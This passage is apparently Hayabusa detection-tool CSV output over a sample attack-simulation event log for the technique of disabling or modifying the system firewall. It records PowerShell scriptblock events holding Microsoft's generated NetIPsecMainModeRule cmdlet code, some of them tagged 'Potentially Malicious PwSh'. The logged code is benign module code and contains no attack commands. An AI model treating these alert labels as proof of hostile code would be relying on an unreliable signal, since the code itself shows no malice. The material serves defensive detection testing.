'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and 
(@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values = @(${Phase1AuthSet}) 
$__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = 
$true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 
[Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } 
} Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System 
Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { 
[object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 